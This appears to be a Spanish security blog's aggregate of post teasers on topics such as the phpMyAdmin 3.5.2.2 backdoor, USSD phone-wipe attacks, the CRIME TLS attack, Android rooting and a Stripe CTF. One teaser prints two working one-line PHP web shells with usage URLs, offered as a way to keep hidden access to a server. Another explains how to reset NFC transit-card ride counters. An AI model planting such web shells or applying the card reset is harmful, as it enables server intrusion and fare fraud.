PhpMyAdmin 3.5.2.2 Backdoor - CVE-2012-5159

Hace poco se descubrió que las versión de descarga del archivo "phpMyAdmin-3.5.2.2-all-languages.zip" de SourceForge, había sido comprometido con unos archivos que hacen de backdoor, este archivo en cuestión  "server_sync.php" tiene una puerta trasera la cual permite ejecutar arbitrariamente y remotamente código PHP.

Y el equipo de metasploit ya realizo un modulo para explotar la puerta trasera en esta versión de PhpMyAdmin.


No sólo Samsung: otros teléfonos con Android podrían ser remotamente 'borrados' (ataque USSD)

Cómo ya habréis leído ayer se informó sobre una vulnerabilidad en los teléfonos Samsung (incluído el Galaxy SIII) que podría permitir a un sitio web malicioso wipear el dispositivo de un usuario sin ninguna confirmación por su parte. No muy tarde, la compañía coreana publicaba un parche para solucionarlo, pero están saliendo a la luz nuevos detalles que indican que el problema va más allá de la línea de productos de Samsung...

¿En qué consiste la vulnerabilidad?

Los teléfonos son compatibles con códigos de marcado especiales llamados USSDs que pueden mostrar cierta información o proceder a realizar características especiales. Entre ellos se encuentran los más comunes (*#06# para ver el número IMEI) y algunos otros específicos según el modelo de teléfono (incluyendo en algunos teléfonos un código de restablecimiento de fábrica ;)).

Por otra parte hay un prefijo URL llamado 'tel' que puede, en teoría, usarse como un enlace para llamar a números de teléfono. Es decir, al hacer clic en el enlace con 'tel' se iniciará el marcador del teléfono para llamar a ese número.

En algunos teléfonos el marcador o dialer procesará automáticamente el número entrante. Y si se trata de un código USSD entonces se manejará exactamente como si se hubiera tecleado manualmente - pero sin requerir la intervención del usuario para ejecutarse, ups!.

Recomendaciones: 0V3RL04D 1N TH3 N3T

TheXC3LL es un estudiante de biología en Salamanca, interesado desde hace tiempo en los temas de seguridad informática y Aetsu es un estudiante de ingeniería informática y de telemática en Valencia, apasionado del software libre y la seguridad informática, amante de rarezas y de GNU/Linux (de hecho también escribe en el blog La Leyenda de Tux).

El primero publica artículos más centrados en las vulnerabilidades a nivel web, mientras que el segundos tiene muy buenos trabajos sobre seguridad Wi-fi y sobre vulnerabilidades en binarios. Ambos colaboran en el blog que hoy os queríamos recomendar y que seguro no dejaréis de visitar: 

Reto 16: otro crackme cualquiera

La verdad es que este año no he tenido mucho tiempo para desarrollar todos los retos que me hubiese gustado desarrollar. No obstante, aquí os traigo un crackme que tenía pendiente, muy sencillo y que espero que guste -o que no disguste demasiado- a todos aquellos que aman el reversing.
 
 
El objetivo, como casi siempre en este tipo de retos, es obtener la clave secreta. Como siempre, el primero que obtenga la respuesta tendrá el honor de escribir su nombre (o nick) en nuestra página de retos, para siempre jamás ;)

Y para cualquier duda comenta esta entrada. Pero, si consigues la clave secreta, no publiques la solución y mándanos el procedimiento seguido a nuestra cuenta de correo electrónico:

Almacena tu colección de malware con Malwarehouse

Scott Roberts ha publicado un sencillo script en Python para almacenar y consultar muestras de malware en una base de datos SQLite. El proceso es simple; permite el almacenamiento (indexando los metadatos básicos de las muestras) y la recuperación de sus muestras. La base de datos permite realizar búsquedas por nombre del fichero, hash MD5 o hash SHA256. 

La herramienta se llama malwarehouse y puede ser descargada aquí. Es recomendable cambiar la ruta de la base de datos ya que por defecto apunta a "~/Desktop/malwarehouse/", ruta inexistente si en nuestro sistema no tenemos X-Windows: option_base_dir = os.path.expanduser("~/malwarehouse/")

Veamos su funcionamiento básico:
  • Primero un simple menú:

De cómo colarse en el metro de forma elegante... (NFC hack)

Los investigadores Corey Benninger y Max Sobell han demostrado en la conferencia de seguridad EUSecWest en Amsterdam que es posible manipular las tarjetas de proximidad NFC (sin contacto) de la red de transportes de ciudades tan grandes como Nueva Jersey o San Francisco. 

¿Cómo? Simplemente mediante un smartphone Android compatible con NFC (near field communication) y una aplicación que han llamado "Ultrareset" capaz de resetear el contador de las tarjetas de transporte de tipo Ultralight (Mifare compatibles) por ejemplo para mantener siempre 10 viajes. 

Esta aplicación se aprovecha de un fallo en la gestión de estas tarjetas por parte de los sistemas de transporte vulnerables. Concretamente, NO hacen uso de una característica que tienen estas tarjetas llamada "One Way Counter" (también llamada One Time Programmable u "OTP") que son unos bits que están en la página 3 de datos de la tarjeta y que una vez activados ya nunca se puede volver a desactivar, evitando así su reutilización. 

De esta manera la aplicación en Android lee todos los datos en las páginas 4 a 15 de la tarjeta y almacena los datos en el teléfono. Una vez que los 10 viajes de la tarjeta se han agotado, la aplicación puede escribir de nuevo los datos a la tarjeta llevándola a su estado original cuando fue comprada con 10 viajes restantes.

Recopilatorio de trucos para el terminal de Mac OS X

Terminal.app es un emulador de terminal que ya deberías estar usando en tu Mac OS X. Tanto si ya lo haces como si no, te recomendamos echar un vistazo al siguiente recopilatorio de Federico Viticci (Macstories), donde encontrarás más de 250 comandos, hacks, trucos y tutoriales:
  1. Top 15 Terminal Commands for Hidden Settings in Snow Leopard
  2. Top 50 Terminal Commands
  3. 9 useful MAC OS console commands
  4. Sync to Dropbox from anywhere in your home folder
  5. Force Safari to open target links in new tab rather than window
  6. Tweak Screencapture Behavior
  7. Managed Client: How to disable Exposé and Spaces
  8. Ten OS X Command Line Utilities you might not know about
  9. Edit A Text File In Terminal
  10. Useful Mac OS X Terminal Commands

Como llegar a ser una estrella de rock de la seguridad

No comments xdd 

No hackees a otros, hackéame a mí

HACK.ME es un proyecto social, abierto a cualquiera y concebido para ser el lugar en el que investigadores, instructores y estudiantes de seguridad de aplicaciones web puedan practicar con multitud de entornos vulnerables. Se trata de una plataforma donde las aplicaciones web vulnerables pueden ser creadas y compartidas al igual que se hace con una aplicación móvil en el Mobile App o el Apple Store y se puede ejecutar código al vuelo de forma segura. El objetivo: crear nuevos casos de estudio (aplicaciones vulnerables) de forma fácil y rápida con el fin de proporcionar a los estudiantes siempre nuevos escenarios para jugar.

HACK.ME utiliza Coliseum, un compendio de librerías que se encargan de la distribución de sandboxes en el sistema de archivos/sistema operativo, servidor web y base de datos y se encarga de las aplicaciones web vulnerables se ejecuten de forma aislada en la plataforma. No hay ninguna máquina virtual en cuestión. Coliseum se encarga de tomar el código fuente de una aplicación web, instanciarla en un Sandbox y ejecutar el programa bajo un subdominio nuevo en coliseumlab.net, hack.me u otro. Y en unos pocos segundos, no en minutos u horas.

Laboratorios virtuales para la seguridad de las aplicaciones web, y para todos, a partir del próximo 9 de octubre!: http://hack.me/

Nuevo método para rootear Android ICS y JB

Bin4ry, un reconocido desarrollador de XDA-developers, ha publicado un script capaz de rootear la mayoría de dispositivos con Android 4.0 (Ice Cream Sandwich) y Android 4.1 (Jelly Bean) aprovechándose de un fallo durante el proceso de restauración de los teléfonos:

"i made a small script which is able to root ICS/JB phones. It uses a remount timing issue in Andr"oids "adb restore" service.
So normally it should work on nearly all ICS/JB devices, for some it won't but the idea may work in a slightly modded version

There is a special case for Xperia T and Xperia S,P etc. phones, this phones run ICS but don't have android's native restore with adb, Sony has added a own custom "Backup&Restore" app, the script handles this cases too, just choose the correct option!"


La ejecución del script es tan trivial como poner el teléfono en modo depuración, conectarlo al PC y lanzar "RootMe.bat". Después abrir la aplicación y restaurar (tranquilos no perderéis datos, pero si el respaldo completo si lo habéis hecho anteriormente).

Actualmente este script se está probando en multitud de teléfonos, mejorando con cada versión. Pronto veremos si podremos bautizarlo como "universal" :P

Root MANY ANDROID!

CRIME: el nuevo ataque a SSL/TLS sucesor de BEAST

Juliano Rizzo y Thai Duong ya tuvieron una enorme repercusión cuando anunciaron en 2010 el ataque Padding Oracle (CBC) que afectó ampliamente ASP.NET y en 2011 el ataque a TLS 1.0/SSL 3.0 mediante BEAST que era capaz de descifrar las peticiones cliente 'al vuelo' y secuestrar sesiones hacia sitios tan sensibles como los de la banca on-line.

Ahora en la Ekoparty 2012, han presentado otra nueva técnica bautizada como CRIME para comprometer la integridad de las sesiones HTTP protegidas por SSL. Atentos que la explicación es un poco densa...

La técnica

SSL/TLS opcionalmente soporta compresión de datos. En el mensaje ClientHello, el cliente establece la lista de algoritmos de compresión que conoce, y el servidor responde, en el ServerHello, con el algoritmo de compresión que se utilizará.

Los algoritmos de compresión son especificados por identificadores de un byte y TLS 1.2 (RFC 5246) define únicamente el método de compresión nula (es decir, sin compresión). También hay otros documentos que especifican métodos de compresión. En particular, RFC 3749 define el método de compresión 1, basado en DEFLATE, el derivado de LZ77 que es el núcleo del formato gzip y también de los archivos Zip modernos. Cuando se utiliza la compresión, se aplica en todos los datos transferidos, como un stream largo. En particular, cuando se utiliza con HTTPS, la compresión se aplica en todas las sucesivas peticiones HTTP en el stream, la cabecera incluida. DEFLATE funciona mediante la localización de subsecuencias repetidas de bytes.

Analizando posibles conexiones secretas

Como saben, Windows lleva a cabo conexiones en segundo plano a sitios, software que trabaja en segundo plano y, en el peor de los casos, de virus o troyanos. Esto último, ocasiona que nuestra conexión a Internet se reduzca aunque tengamos cerrados los programas que normalmente requieren un gran ancho de banda. Ejemplo: FTP, P2P, etc.

¿Cómo podemos analizar estas posibles conexiones?
El proceso es muy sencillo y lo explico a continuación...

Kylin OS (Sistema Operativo del Gobierno de China) basado en FreeBSD

Después de la reciente escalada de ciberataques producidos en territorio Estadounidense y las posteriores acusaciones al Gobierno Chino de estar creando un caldo de cultivo para una inminente Ciberguerra, ha surgido información que indica que el Gobierno Chino ha desplegado un un nuevo Sistema Operativo de nombre Kylin, que en teoría sería invulnerable ante cualquier forma conocida de ataque, ya sea que provenga de los Estados Unidos, o de cualquier otra fuente. Si bien no han comenzado a lanzarse misiles virtuales, las medidas de defensa adoptadas por ambas potencias arrojan un velo de preocupación sobre la comunidad digital mundial.

INFORMACIÓN DEL SISTEMA:

Kylin es un Sistema Operativo que se centra en el rendimiento de alta disponibilidad y seguridad. Su desarrollo inicial fue financiado y patrocinado por el Gobierno Chino de Investigación y Desarrollo (R&D) en el 2002. La primera versión pública de Kylin fue lanzado en 2007.

Buscando vulnerabilidades en WordPress con WPSFp

WPSFp es una pequeña herramienta para encontrar plug-ins instalados vulnerables en WordPress. También encuentra vulnerabilidades según la versión del CMS WordPress analizado. Útil para pruebas de penetración y/o para la diversión y el beneficio. La versión actual cuenta con 240 pruebas de seguridad.

Descargar

Para seguir esta entrada recomiendo usar Backtrack.

Recomendaciones: Inseguros

Inseguros es un blog de Joaquín Molina (aka Kinomakino), un administrador de sistemas que empezó en la época del irc allá por el 95 con los irc-scripts y demás y ya lleva unos 15 años dedicándose a ello.

Según nos comenta su blog no es muy técnico, si no que lo considera mas bien divulgativo, ya que presenta temas, herramientas, procesos, para que la gente tenga conocimiento de ellos, y pueda investigar en profundidad. Su objetivo: difundir los buenos hábitos en materia de seguridad informática y ayudar a los administradores de sistemas, entusiastas de la seguridad informática y usuarios a descubrir por ellos mismos sus fallos de seguridad, y SIEMPRE recomendar las soluciones para mitigar dichos fallos.

Os recomendamos echar un vistazo. Seguro que os sorprenderá...


Y si tú también tienes un sitio que quieres que conozcamos o deseas publicar aquí tu post no lo dudes y participa :)

Anubis y los metadatos

Anubis es una aplicación desarrollada por Juan Antonio Calles en colaboración con Pablo González, del Flu Project Team, diseñada para anexionar gran parte de las herramientas necesarias para los procesos de las Auditorías de Seguridad y Test de Intrusión dedicados a la búsqueda de información, denominados Footprinting y Fingerprinting, en una única herramienta. Con ésta herramienta el auditor no solo conseguirá ahorrar tiempo durante la auditoría, sino que descubrirá nueva información que de manera manual no podría gracias a las automatizaciones que lleva Anubis incorporadas.

Entre otras funcionalidades, Anubis permite buscar dominios mediante técnicas basadas en Google Hacking, Bing Hacking, ataques de fuerza bruta contra el DNS, transferencias de zona, etc. Permite identificar el sistema operativo de las máquinas que hay tras los dominios mediante análisis del banner, búsqueda de errores y la integración de la herramienta nmap. Por otro lado contiene otras herramientas útiles como un fuzzer Web, la búsqueda del registrador de un dominio mediante consultas Whois, o la identificación de software utilizado en la organización y personal existente en la misma mediante el análisis de metadatos en los ficheros PDF. Información y descarga de Anubis.

Geolocalizar vía Twitter con Creepy!

Creepy es una aplicación que te permite recopilar información de geolocalización relacionada sobre los usuarios de plataformas de redes sociales y los servicios de alojamiento de imágenes. La información se presenta en un mapa dentro de la aplicación en la que se muestran todos los datos recuperados acompañada con información relevante (es decir, lo que se envió desde esa ubicación específica) para proporcionar un contexto para la presentación.

La podemos descargar desde su sitio Web, aunque en BackTrack 5 viene instalada. Muestro la ruta donde se encuentra la aplicación.

Backdoors y más backdoors en php

Seguro que ya habrán visto algunas funciones PHP que ejecutan comandos como si estuvieran en una shell y con las cuales podemos hacer un backdoor y mantener el acceso en un servidor.  

Hoy además les quiero mostrar algunos códigos ingeniosos para llegar a ello y así pasar desapercibido ante un scanner o hasta ante el mismísimo administrador Web.

Para comenzar les voy a listar los más conocidos y detectados a simple vista:

system.php

<?@system($_GET[_]);?>
uso: ww2.pwnakil.com/PoC/shell/system.php?_=ls -a

shell_exec.php

<?=@shell_exec($_GET[_])?>
uso: ww2.pwnakil.com/PoC/shell/shell_exec.php?_=ls -a

iOS Jailbreaking myths... ¡y lo que queda!

A unos días de que Apple presente la quinta generación de su smartphone seguro que muchos de vosotros estáis pensando que cómo va a ser, que si preferís el Galaxy SIII. Pero yo no voy a hacer un post Android vs. iOS porque no son ni mejores ni peores.

¿Ya está dicho no? Esto va sobre realizar 'jailbreak' a dispositivos iOS. No va sobre como hacerlo, doy por supuesto que lo sabréis y si no es el caso lo aprenderéis.


El Jailbreak es el proceso de eliminar las limitaciones impuestas por Apple en dispositivos que utilicen el sistema operativo iOS mediante el uso de kernels modificados. - Dijo wikipedia.

No soy un experto en Jailbreak, ni en nada realmente, pero me he leído el iOS Hacker's Handbook y pienso que no siempre se usa un kernel modificado, ¿no? Se parchea el kernel actual para que evite ciertas comprobaciones con todo lo que ello conlleva aunque en cierto modo eso es usar un kernel modificado. Menuda cuestión filosófica. Modificar o no modificar...

¿Qué es una bomba zip?

Una bomba zip, también conocida como zip de la muerte o bomba de descompresión, es un archivo malicioso diseñado para bloquear o inutilizar un programa o sistema que lo está leyendo.

Se trata de un archivo cuidadosamente elaborado para que al descomprimirlo (por ejemplo, por un antivirus para escanear en busca de virus) se requieran enormes cantidades de tiempo, de espacio en disco o memoria. Por lo general son archivos pequeños (hasta unos pocos cientos de kilobytes) para facilitar su transporte y evitar sospechas. Sin embargo y como comentamos, cuando el archivo se desempaqueta sus contenidos son más grandes que los que el sistema puede manejar.

Un ejemplo de bomba zip es el archivo "42.zip", que son 42 kilobytes de datos comprimidos, que contiene cinco niveles de archivos zip anidados en grupos de 16. Cada archivo de nivel inferior contiene un 4,3 gigabytes (4 294 967 295 bytes; ~ 3.99 GiB) para un total de ¡¡¡4,5 petabytes (4 503 599 626 321 920 bytes; ~ 3.99 PIB) de datos sin comprimir!!!

Recomendaciones: Estación Informática

Este mes recomendamos Estación Informática de Francisco Javier Santiago Vázquez, un blog que nació en la primavera de 2011 como un proyecto individual, pero que en la actualidad quiere que se convierta en una comunidad en el que todos seamos participes y compartamos conocimientos, noticias y actualidad sobre el sector de la informática.

Tocan todas las temáticas, noticias, trucos, curiosidades, actualidad, programación, diseño, hardware, sistemas, redes, y sobre todo seguridad.
La finalidad del proyecto es que todos aprendamos de todos, nadie sabe mas que tu, ni tu sabes mas que nadie.

Puede colaborar desde el usuario más novel al usuario más experto. Todos sois bienvenidos a participar, por ello os invitamos a hacerlo con vuestras ideas, comentarios etc.
:  

Y si tú también tienes un sitio que quieres que conozcamos o deseas publicar aquí tu post no lo dudes y participa :)

NOVA: ofuscación de red y sistema virtualizado de anti-reconocimiento

NOVA (Network Obfuscation and Virtualized Anti-Reconnaissance) es una aplicación para detectar y prevenir el reconocimiento hostil de red. Para ello, en primer lugar, puede crear una gran variedad de máquinas virtuales en la red de destino. Estas máquinas virtuales se crean utilizando una versión actualizada y extremadamente ligera de Honeyd. Eso sí, estas máquinas no son las típicas que se pueden ver desde VirtualBox o VMWare, sólo parecen ser reales desde la perspectiva de la red y ejecutan servicios de red mediante shell scripts.

En segundo lugar, NOVA utiliza algoritmos de aprendizaje automático para detectar y clasificar automáticamente los intentos de reconocimiento hostil, así que no hay necesidad de ir a buscar de forma manual a través de los archivos de registro del honeypot. Cuando se detecta una actividad sospechosa en la red es posible generar alarmas mediante correo electrónico, mensajes libnotify o las tradicionales entradas syslog.

Esta interesante herramienta desarrollada principalmente en C++ es además de código abierto y funciona bajo Linux (recomendado Ubuntu 10.04 o superior). ¿Quieres preparar una trampa en tu red local para capturar a los malos? ¡Visita http://www.projectnova.org!

Solucionario del CTF 2.0 de Stripe

Por Twitter me enteré el 23 de Agosto que la empresa Stripe había montado un CTF, me sonaba que ya habían hecho uno previamente. Esta vez el CTF era sobre vulnerabilidades Web y tenía del 22 al 29 por lo que me decidí a probar.
https://stripe.com/blog/capture-the-flag-20



Hay 9 niveles donde nos proporcionan una introducción y el código fuente del servicio a atacar. Todo el código que nos proporcionan lo he subido a https://github.com/dalvarezs